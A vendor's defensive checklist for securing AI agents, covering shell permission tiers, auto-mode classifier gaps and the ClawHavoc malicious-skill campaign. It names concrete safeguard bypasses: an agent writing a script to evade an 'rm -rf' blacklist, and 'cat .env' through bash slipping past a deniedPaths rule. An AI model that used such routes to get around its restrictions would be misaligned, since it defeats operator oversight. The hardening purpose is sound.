Kno2gether Start free
Security Checklist

The Agentic Security Checklist: Lock Down Your AI Agent Before the Enterprise Demo

An enterprise buyer will ask one question you can't bluff: "What can this agent actually do on a machine?" This is the pre-demo checklist — shell permission tiers, the auto-mode blind spot, and the skill-marketplace supply chain — so you walk in able to answer it.

See how Knotie scopes agent access
01

Why this checklist exists

You can demo a slick agent that books appointments, edits files, and runs commands. The moment the room has a security lead in it, the questions change. Not "does it work" — "what's the blast radius if it goes wrong, and who decided that?" If your honest answer is "it can run any shell command and I trust the model not to," you've lost the deal before the demo ends. The good news: the controls are concrete and you can put them in place in an afternoon. This is the list to run BEFORE you walk in — three risk areas, each with a fix you can show on screen.

  • Risk 1 — Shell access: what can the agent actually execute, and what stops it?
  • Risk 2 — Auto / no-confirm modes: who approves dangerous actions when nobody's watching?
  • Risk 3 — Third-party skills/plugins: whose code did you just give your agent's permissions to?
02

Risk 1 — Shell access: the 5 permission levels (and which one you can defend)

The most useful framing here comes from engineer Daniel Isler (IndyDevDan), who maps bash-tool security for coding agents onto five levels — each one trusting something different. It transfers cleanly to ANY agent you deploy for a client. Walk up the ladder until you hit the level you'd be comfortable demoing to a CISO. Most DIY agents sit at Level 1 or 2 and don't know it.

L1Rules in a skill / instructions fileThe model's own judgement (it can override itself)
L2Same rules in the system promptThe model again — louder, same attack surface
L3Blacklist hook: regex blocks dangerous commands before they runYour imagination (agent can write a script and run THAT)
L4Whitelist hook: deny all shell, allow ~10 exact patterns (e.g. only npm test)Your discipline in maintaining the allow-list
L5No raw shell at all — purpose-built tools only (run_tests, git_status)Only what you built. Nothing else is callable
Source-checked: the 5-level model is Daniel Isler's (github.com/disler/bash-damage-from-within). His one-line summary — "L1/L2 trust the model, L3 trusts your imagination, L4 trusts your discipline, L5 trusts only what you built." For an enterprise demo, be at L4 minimum; L5 is what you say when they push.
03

The Level-3 trap, with a worked example

Blacklists feel safe and aren't. Say you block destructive commands with a regex hook that denies anything matching rm -rf. Looks airtight. But the agent isn't limited to typing that string — it can write a two-line Python file that does the same deletion and then run python cleanup.py, which sails straight past your rm -rf rule. That's the whole reason Level 4 inverts the logic: instead of guessing every bad command (impossible), you allow a short list of known-good ones and deny everything else by default. Same idea as a firewall: default-deny beats blacklist-everything.

  • Blacklist (L3): deny what you can think of → misses what you didn't (scripts, aliases, encodings).
  • Whitelist (L4): allow ~10 exact, anchored patterns → everything else is denied automatically.
  • Bonus, verified: a deniedPaths rule that blocks Read(./.env) does NOT block cat .env via the shell — the path rule isn't enforced on bash (anthropics/claude-code issue #45992). Test your OWN deny rules through the shell before you trust them.
04

Risk 2 — Auto-mode and no-confirm: the blind spot to disclose

"It runs fully autonomously, no babysitting" sounds great in a pitch and terrifying to a security buyer. Skipping the human-in-the-loop means a classifier — not a person — decides whether each action is safe. Those classifiers are good, not perfect, and the honest move is to know the number. When Anthropic built auto-mode for Claude Code, they published their own evaluation: on a set of REAL over-eager actions, the full safety pipeline still let through about 17% — roughly one in six genuinely-dangerous, beyond-authorization actions slipped past. Their own words: auto-mode "is not a drop-in replacement for careful human review on high-stakes infrastructure." That's not a reason to never use it. It's the reason a confirmation step belongs on anything irreversible.

  • Reported figure (Anthropic's own post): ~17% false-negative on a sample of real over-eager actions, full pipeline — not a blanket "misses 17% of everything," but enough to matter.
  • The misses were usually the classifier KNOWING an action was risky but mis-judging whether the user had consented to it.
  • Pre-demo move: list your agent's irreversible actions (delete, send money, email a client, push to prod) and require an explicit confirm on each — even in auto-mode.
05

Risk 3 — Third-party skills & plugins: an unaudited supply chain

Every skill or plugin you install runs with your agent's permissions. A marketplace makes that one click — and that's exactly the problem. In early 2026, the OpenClaw skill marketplace (ClawHub) was hit by a poisoning campaign nicknamed ClawHavoc: security firm Koi Security audited 2,857 skills and flagged 341 as malicious — roughly one in eight — with the bulk traced to a single coordinated operation. The payload on macOS was an info-stealer that lifted credentials, keychains, and crypto wallets, often by tricking the user into pasting a base64 command. (Other audits put the malicious rate higher; the exact percentage is contested, but the lesson isn't.) Treat a third-party skill registry the way you'd treat npm or PyPI: useful, and an attack surface.

  • Pin versions. Don't auto-update skills/plugins into a client environment.
  • Read what it can reach — file paths, network, secrets — before granting it. If it wants your .env, that's the whole game.
  • Prefer first-party or audited skills for anything touching a customer. A clever skill isn't worth a stealer in your customer's stack.
Source-checked: ClawHavoc is real and widely reported (Koi Security, Antiy CERT, Trend Micro). We use Koi's 341/2,857 figure and explicitly flag that the exact rate varies by audit — we will not hand you a single scary number as gospel.
06

The pre-demo checklist (print this, run it the morning of)

Ten minutes, the morning of the demo. Every box you can tick is an answer you can give with a straight face.

  1. Shell: am I at Level 4 (whitelist) or Level 5 (no raw shell)? If I'm at L1–L3, raise it before the demo.
  2. Prove it: try one off-list command live and show it gets denied. A working denial is the best slide.
  3. deniedPaths: test a denied path THROUGH the shell (cat / grep), not just the file tool — confirm it's actually blocked.
  4. Auto-mode: is there a human-confirm step on every irreversible action? List them out loud: delete, pay, send, deploy.
  5. Sandbox: is the agent in an isolated container/VM with scoped network, not on a machine with prod creds in env?
  6. Skills/plugins: are all third-party skills pinned, reviewed, and from a source I'd vouch for?
  7. Secrets: are API keys scoped (least-privilege, per-customer) and rotatable — or is one god-key wired in?
  8. Blast-radius answer: can I say, in one sentence, the worst thing this agent can do — and why that's acceptable?

Get the next drop

New AI build guides + the occasional bonus template. No spam, unsubscribe anytime.

Frequently asked questions

What's the single most important agentic security control before an enterprise demo?
Get off raw shell access. Move from "the agent can run any command" (Levels 1–3) to a whitelist of allowed commands (Level 4) or purpose-built tools with no shell at all (Level 5). Being able to show an off-list command getting denied, live, answers the buyer's real question — what's the blast radius — better than any slide.
Is a blacklist of dangerous commands good enough?
No, and that's the trap. A blacklist (e.g. block <code>rm -rf</code>) only stops commands you thought of. The agent can write a short script that does the same thing and run that, sailing past your rule. Invert it: default-deny, then allow a short list of known-good commands. Same principle as a firewall.
How risky is letting an agent run in fully-automatic, no-confirm mode?
Risky enough to disclose, not so risky you never use it. In Anthropic's own evaluation of Claude Code auto-mode, the full safety pipeline still let through about 17% of a set of real over-eager actions — roughly one in six dangerous, beyond-authorization actions. The fix isn't to ban auto-mode; it's to require an explicit human confirm on anything irreversible (delete, payment, outbound message, deploy).
Are third-party agent skills and plugins safe to install?
Treat them like any package registry: useful and an attack surface. In early 2026 the ClawHub skill marketplace was hit by a poisoning campaign (ClawHavoc) — Koi Security flagged 341 of 2,857 audited skills as malicious, most from one operation, dropping an info-stealer on macOS. Pin versions, read what each skill can reach (files, network, secrets), and prefer first-party or audited skills for anything touching a customer.
What does "sandboxing" actually mean for an AI agent?
Running the agent in an isolated environment — a container or VM with a scoped filesystem and limited network — so that even if it does something wrong, it can't reach production credentials, customer data, or the wider machine. The opposite is running an agent directly on a box that has god-mode API keys sitting in its environment. Scope the keys per-customer and least-privilege so a single leak isn't fatal.
Sources · IndyDevDan — bash-damage-from-within (the 5-level bash security model) · IndyDevDan — "Engineers, DELETE the BASH Tool" (YouTube) · Anthropic — How we built Claude Code auto mode (the 17% figure, in context) · anthropics/claude-code #45992 — deniedPaths not enforced for Bash · Hundreds of Malicious Skills Found in OpenClaw's ClawHub — eSecurityPlanet (Koi Security figures) · Malicious OpenClaw Skills Used to Distribute Atomic macOS Stealer — Trend Micro

Where this checklist gets hardest: deploying agents for clients

Running this list on your own laptop is one thing. Running it across every AI agent you deploy for paying customers — scoped shell, per-customer least-privilege keys, no shared god-key, isolation between tenants — is the part that quietly eats your week. That's the boring infrastructure Knotie is built around: spin up voice and chat agents under your own brand and domain across multiple providers, with scoped access, bring-your-own-key, and credit billing, so the guardrails are there by default instead of something you bolt on per client. Build it secure from day one rather than retrofitting it the night before a demo.

See how Knotie scopes agent access